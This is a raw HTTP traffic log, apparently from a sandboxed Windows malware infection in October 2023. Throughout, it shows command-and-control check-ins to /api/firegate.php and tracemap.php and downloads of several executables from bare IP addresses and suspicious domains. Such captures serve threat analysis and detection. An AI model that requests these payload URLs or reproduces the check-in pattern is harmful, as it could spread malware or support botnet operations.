GET /c235031/u52355237/docs/d13/0aeb7c514923/PL_Client.bmp?extra=zEYLOhDaQqXBo8LHo45R7nwioXoRej0oNRyEVJGCrqajrvSvMw0tliZUIWtDiJ7aOfgdBozitFTgy__8OMIvxe4kKI1wRLO-Ex-HxkH2YWqrhTpszc1R-VBrI5-Kmqhg_zVTt6CoGc2U5-Af HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:07:28 GMT Content-Type: image/x-ms-bmp Content-Length: 3685892 Connection: keep-alive Last-Modified: Fri, 29 Sep 2023 10:24:43 GMT ETag: "6516a5eb-383e04" Expires: Sun, 05 Nov 2023 10:07:28 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c237231/u52355237/docs/d22/84c17767b8f5/2.bmp?extra=7GGUqehS9cUw4D_UVlnB-WQh96d-uDWVI9rWh5wEXCeBm0fdDYnLC_zieZY4sPcEWwLMlYJVF6StZc55T2RYsn9F-Ukgh9zqn8ob0nvmE6-oS-hUZ8a-1KX2SINgfeEiVIsNlQPFV_oevlI3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:07:29 GMT Content-Type: image/x-ms-bmp Content-Length: 178180 Connection: keep-alive Last-Modified: Thu, 05 Oct 2023 14:48:31 GMT ETag: "651eccbf-2b804" Expires: Sun, 05 Nov 2023 10:07:29 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:05:49 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:05:51 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:05:59 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 4928 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:00 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:21 GMT ETag: "3fde00-6067cccc77333" Accept-Ranges: bytes Content-Length: 4185600 Content-Type: application/x-msdos-program

HEAD /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 194.169.175.232 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:01 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Fri, 06 Oct 2023 07:11:15 GMT ETag: "1d6800-60706f238c98c" Accept-Ranges: bytes Content-Length: 1927168 Content-Type: application/x-msdownload

HEAD /navi/kur90.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.68.249 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:00 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 06 Oct 2023 10:03:25 GMT ETag: "1d4000-6070959ec92f0" Accept-Ranges: bytes Content-Length: 1916928 Content-Type: application/x-msdos-program

HEAD /api/files/software/s2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 5.42.64.10 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Type: application/octet-stream

HEAD /calc2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: isaiahbenjamin.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html

GET /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:00 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:21 GMT ETag: "3fde00-6067cccc77333" Accept-Ranges: bytes Content-Length: 4185600 Content-Type: application/x-msdos-program

GET /calc2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: isaiahbenjamin.top Cache-Control: no-cache

HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html

GET /api/files/software/s2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 5.42.64.10 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 372224 Content-Type: application/octet-stream

GET /navi/kur90.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.68.249 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:01 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 06 Oct 2023 10:03:25 GMT ETag: "1d4000-6070959ec92f0" Accept-Ranges: bytes Content-Length: 1916928 Content-Type: application/x-msdos-program

GET /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 194.169.175.232 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:01 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Fri, 06 Oct 2023 07:11:15 GMT ETag: "1d6800-60706f238c98c" Accept-Ranges: bytes Content-Length: 1927168 Content-Type: application/x-msdownload

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:39 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 541 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:40 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:44 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /ip.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: WZmR-6o4ny-Y-1ej1o*y Host: 5.42.64.10

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 4529 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:48 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/files/client/s21 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: WZmR-6o4ny-Y-1ej1o*y Host: 5.42.64.10 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 30 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /syncUpd.exe HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: 8033-25422-8707-7795 Host: aidandylan.top Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html

GET /syncUpd.exe HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: 8033-25422-8707-7795 Host: aidandylan.top Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/files/client/s22 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: WZmR-6o4ny-Y-1ej1o*y Host: 5.42.64.10 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/files/client/s23 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: WZmR-6o4ny-Y-1ej1o*y Host: 5.42.64.10 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/files/client/s24 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: WZmR-6o4ny-Y-1ej1o*y Host: 5.42.64.10 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=175.208.134.152&slots=1000&param=empty HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Host: script.google.com

HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 06 Oct 2023 10:06:51 GMT Location: https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=175.208.134.152&slots=1000&param=empty X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:54 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:54 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 3 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 403 Forbidden Date: Fri, 06 Oct 2023 10:06:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4520 Connection: keep-alive X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Fri, 06 Oct 2023 10:07:10 GMT Server: cloudflare CF-RAY: 811d182eceebc10f-ICN

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:56 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:56 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 42 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/WWW14_64.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:57 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:22 GMT ETag: "677c00-6067cccd916ee" Accept-Ranges: bytes Content-Length: 6781952 Content-Type: application/x-msdos-program

GET /download/WWW14_64.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:57 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:22 GMT ETag: "677c00-6067cccd916ee" Accept-Ranges: bytes Content-Length: 6781952 Content-Type: application/x-msdos-program

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:59 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 492 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /zinda.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Oct 2023 10:07:00 GMT Content-Type: application/octet-stream Content-Length: 16458752 Last-Modified: Fri, 06 Oct 2023 06:40:07 GMT Connection: keep-alive ETag: "651fabc7-fb2400" Accept-Ranges: bytes

HEAD /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Oct 2023 10:07:00 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

GET /zinda.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Oct 2023 10:07:00 GMT Content-Type: application/octet-stream Content-Length: 16458752 Last-Modified: Fri, 06 Oct 2023 06:40:07 GMT Connection: keep-alive ETag: "651fabc7-fb2400" Accept-Ranges: bytes

GET /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Oct 2023 10:07:00 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

HEAD /f/fikim0926727.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 230926170958727.kmj.xne26.cfd Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Fri, 06 Oct 2023 10:07:01 GMT

GET /f/fikim0926727.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 230926170958727.kmj.xne26.cfd Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Fri, 06 Oct 2023 10:07:01 GMT Content-Length: 17

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:07 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 389 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:08 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:10 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /test2/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:11 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 557 Connection: close Content-Type: text/html; charset=UTF-8

GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: colisumy.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:11 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 Last-Modified: Mon, 02 Oct 2023 16:09:22 GMT ETag: "54a00-606bdff55cf63" Accept-Ranges: bytes Content-Length: 346624 Connection: close Content-Type: application/octet-stream

GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:14 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT ETag: "2600-5c86757379380" Accept-Ranges: bytes Content-Length: 9728 Connection: close Content-Type: application/x-msdownload

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:18 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 1920 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT ETag: "37d-603761e33cf00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 06 Oct 2023 11:07:19 GMT Date: Fri, 06 Oct 2023 10:07:19 GMT Connection: keep-alive

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 285 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:20 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

